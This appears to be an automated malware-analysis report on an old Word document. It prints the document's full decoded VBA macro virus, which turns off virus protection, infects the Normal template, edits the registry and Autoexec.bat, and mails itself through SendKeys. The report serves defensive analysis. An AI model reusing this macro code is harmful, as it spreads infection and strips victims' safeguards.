Office (OLE) malware analysis — malicious · 166be4975df0a5e6

MALICIOUS

Office (OLE)

55.0 KB Created: 1998-10-17 09:16:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 9c4eab1909e99ba6668ebfd3a2d9c041 SHA-1: e412faabddadf76249857d76fcfe65a5d1405bbe SHA-256: 166be4975df0a5e6a0c8b4d4bff7f9e4511837db17b7c8140c1037b05f232596

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for malicious documents. The script attempts to modify the Internet Explorer start page to 'http://www.kevinmitnick.com' and remove menu items related to macros. It also exports a DLL to 'c:\waterf.dll', suggesting it acts as a downloader or dropper for a second-stage payload.

Heuristics 4

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www.kevinmitnick.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3016 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3016 bytes
SHA-256: `da4d886103bef88c7a870f5a95c5e847558b91cd4fa365be4a2829c142fb68e7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "waterfall" Sub AutoOpen() On Error Resume Next Application.DisplayAlerts = wdAlertsNone Options.VirusProtection = False Application.ScreenUpdating = False Options.SaveNormalPrompt = False thinkerinstalled = False Grudge = ActiveDocument GrudgeInstalled = False Thinker = NormalTemplate For z = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(z).Name = "waterfall" Then thinkerinstalled = True End If Next For m = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(m).Name = "waterfall" Then GrudgeInstalled = True End If Next If thinkerinstalled = False Then System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "Start Page") = "http://www.kevinmitnick.com" CommandBars("tools").Controls("Templates and add-ins...").Delete CommandBars("tools").Controls("Macro").Delete End If ToolsOptionsGeneral.SendMailAttach = 1 Application.VBE.ActiveVBProject.VBComponents("waterfall").Export "c:\waterf.dll" If thinkerinstalled = False Then Set waterfallz = NormalTemplate.VBProject If GrudgeInstalled = False Then Set waterfallz = ActiveDocument.VBProject With waterfallz With .VBComponents.Import("c:\waterf.dll") End With End With If GrudgeInstalled = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument Reset Kill "c:\waterf.dll" Application.DisplayAlerts = wdAlertsAll waterfall: If (Month(Now)) = 12 And (Minute(Now)) = 12 Then Open "c:\Autoexec.bat" For Append As 1 Print #1, "@echo off" Print #1, "echo I have committed the sin of hacking and am unfit in the eyes of the Lord." Print #1, "Echo I confess to acts of witchcraft and art, dissidence and voodoo." Print #1, "Echo But in my Craft for which you condemn me," Print #1, "Echo I SURF THE BRAINWAVES OF GOD." Reset End If Call autonomailer End Sub Sub autonomailer() On Error Resume Next If WordBasic.AppIsRunning("Internet Mail") Then ActiveDocument.SaveAs FileName:="c:\doc1.doc", FileFormat:=wdFormatDocument, addtorecentfiles:=False m$ = Application.UserName WordBasic.AppActivate "Internet Mail" WordBasic.SendKeys "%MN" WordBasic.SendKeys "%MR" WordBasic.SendKeys "%o" WordBasic.SendKeys "{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{ENTER}" WordBasic.SendKeys "{TAB}{TAB}" WordBasic.SendKeys "Hey" WordBasic.SendKeys "{TAB}" WordBasic.SendKeys "Hey{ENTER}" WordBasic.SendKeys "Youve just got to read this!{enter}" WordBasic.SendKeys "Peace {enter}" WordBasic.SendKeys m$ WordBasic.SendKeys "%IF" WordBasic.SendKeys "c:\doc1.doc" WordBasic.SendKeys "%A" WordBasic.SendKeys "%FM" WordBasic.SendKeys "^M" End If End Sub

SHA-256: da4d886103bef88c7a870f5a95c5e847558b91cd4fa365be4a2829c142fb68e7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "waterfall"
Sub AutoOpen()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
Application.ScreenUpdating = False
Options.SaveNormalPrompt = False
thinkerinstalled = False
Grudge = ActiveDocument
GrudgeInstalled = False
Thinker = NormalTemplate
For z = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(z).Name = "waterfall" Then
thinkerinstalled = True
End If
Next

For m = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(m).Name = "waterfall" Then
GrudgeInstalled = True
End If
   Next

If thinkerinstalled = False Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "Start Page") = "http://www.kevinmitnick.com"
CommandBars("tools").Controls("Templates and add-ins...").Delete
CommandBars("tools").Controls("Macro").Delete

End If

ToolsOptionsGeneral.SendMailAttach = 1
Application.VBE.ActiveVBProject.VBComponents("waterfall").Export "c:\waterf.dll"
If thinkerinstalled = False Then Set waterfallz = NormalTemplate.VBProject
If GrudgeInstalled = False Then Set waterfallz = ActiveDocument.VBProject
With waterfallz
With .VBComponents.Import("c:\waterf.dll")
End With
End With
  
If GrudgeInstalled = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument

Reset
Kill "c:\waterf.dll"
Application.DisplayAlerts = wdAlertsAll
waterfall:



If (Month(Now)) = 12 And (Minute(Now)) = 12 Then
Open "c:\Autoexec.bat" For Append As 1
Print #1, "@echo off"
Print #1, "echo I have committed the sin of hacking and am unfit in the eyes of the Lord."
Print #1, "Echo I confess to acts of witchcraft and art, dissidence and voodoo."
Print #1, "Echo But in my Craft for which you condemn me,"
Print #1, "Echo I SURF THE BRAINWAVES OF GOD."
Reset
End If
Call autonomailer
End Sub

Sub autonomailer()
On Error Resume Next
If WordBasic.AppIsRunning("Internet Mail") Then
ActiveDocument.SaveAs FileName:="c:\doc1.doc", FileFormat:=wdFormatDocument, addtorecentfiles:=False
m$ = Application.UserName
WordBasic.AppActivate "Internet Mail"
WordBasic.SendKeys "%MN"
WordBasic.SendKeys "%MR"
WordBasic.SendKeys "%o"
WordBasic.SendKeys "{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{ENTER}"
WordBasic.SendKeys "{TAB}{TAB}"
WordBasic.SendKeys "Hey"
WordBasic.SendKeys "{TAB}"
WordBasic.SendKeys "Hey{ENTER}"
WordBasic.SendKeys "Youve just got to read this!{enter}"
WordBasic.SendKeys "Peace {enter}"
WordBasic.SendKeys m$
WordBasic.SendKeys "%IF"
WordBasic.SendKeys "c:\doc1.doc"
WordBasic.SendKeys "%A"
WordBasic.SendKeys "%FM"
WordBasic.SendKeys "^M"
End If

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.